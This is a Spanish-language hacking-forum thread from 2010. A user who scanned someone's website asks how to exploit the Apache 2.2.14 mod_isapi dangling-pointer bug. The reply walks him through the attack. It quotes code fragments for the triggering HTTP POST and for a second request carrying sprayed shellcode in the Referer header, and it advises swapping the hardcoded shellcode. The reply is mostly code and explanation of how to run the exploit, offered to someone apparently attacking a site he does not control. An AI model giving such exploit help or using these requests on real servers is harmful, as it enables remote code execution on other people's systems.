elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía actualizada para evitar que un ransomware ataque tu empresa


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Ayuda Apache 2.2.14 mod_isapi Dangling Pointer
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Ayuda Apache 2.2.14 mod_isapi Dangling Pointer  (Leído 5,555 veces)
Pabloxxx

Desconectado Desconectado

Mensajes: 9


Ver Perfil
Ayuda Apache 2.2.14 mod_isapi Dangling Pointer
« en: 11 Octubre 2010, 08:23 am »

hola.. hoy scanee una pagina web y salto esa vulnerabilidad.. es bastante nuevo el bug este.. si alguien como sabe explotarlo por favor que me ayude..

Saludos
En línea

Pabloxxx

Desconectado Desconectado

Mensajes: 9


Ver Perfil
Re: Ayuda Apache 2.2.14 mod_isapi Dangling Pointer
« Respuesta #1 en: 11 Octubre 2010, 22:25 pm »

hola... nadie sabe nada? hay un video exxplicativo en una web.. pero no alcanzo a entender bien.. por favor que alguien me de una manitoo...

aca les dejo la web que lo explica http://www.senseofsecurity.com.au/advisories/SOS-10-002

Saludos
« Última modificación: 11 Octubre 2010, 22:29 pm por Pabloxxx » En línea

Ivanchuk


Desconectado Desconectado

Mensajes: 469


LLVM


Ver Perfil WWW
Re: Ayuda Apache 2.2.14 mod_isapi Dangling Pointer
« Respuesta #2 en: 12 Octubre 2010, 18:53 pm »

Hola pablo,

Creo que es bastante claro, te explica por todos lados como funciona. Se conecta al server y manda un http-post para hacer que cargue la dll isapi (mod_isapi).
Código:
    triggerVuln = "POST /cgi-bin/" + isapiDLL + " HTTP/1.0\r\n"
        "User-Agent: AAAAAAAA\r\n"
        "Pragma: no-cache\r\n"
        "Proxy-Connection: Keep-Alive\r\n"
        "Host: " + serverIP + "\r\n"
        "Content-Length: 40334\r\n\r\n" +
        string(footer);

Despues paquete reset. Y ahi esta la vulnerabilidad, apache va a descargar la libreria isapi pero quedan referencias al modulo todavia disponibles.
Despues de esto para aprovecharse de esas referencias manda otro http-post pidiendo uso de la libreria descargada

Código:
    payload = "POST /cgi-bin/" + isapiDLL + " HTTP/1.0\r\n"
        "Accept: " + string(accept) + "\r\n"
        "Referer: " + string(referer) + string(shellcode) + "\r\n"
...

En el pedido hace una onda de spray shellcode para tener mas posibilidades de que sea ejecutada. No lo probe, pero es posible que sea una loteria. La shellcode me parece que esta hardcodeada, capaz que tengas que cambiarla.

Saludos.
En línea

Sólo quien practica lo absurdo puede lograr lo imposible.

Join us @ http://foro.h-sec.org
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Apache 2.2.14 mod_isapi Dangling Pointer
Nivel Web
Mafmaestro 4 8,617 Último mensaje 14 Septiembre 2011, 15:57 pm
por Tronos154
Ayuda como leer un Pointer
Programación Visual Basic
abdiel2475 5 3,540 Último mensaje 18 Enero 2011, 23:55 pm
por abdiel2475
Pointer a función (C y VB6)
Ingeniería Inversa
calk9 3 3,015 Último mensaje 14 Noviembre 2013, 02:43 am
por calk9
Duda con Stack Pointer (Registro 13)
ASM
JonaLamper 3 3,100 Último mensaje 27 Marzo 2014, 23:50 pm
por xv0
Error en codigo c++ ISO c++ forbids comparision between pointer and integer
Programación C/C++
qwertyui 2 2,380 Último mensaje 22 Mayo 2016, 08:45 am
por qwertyui
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines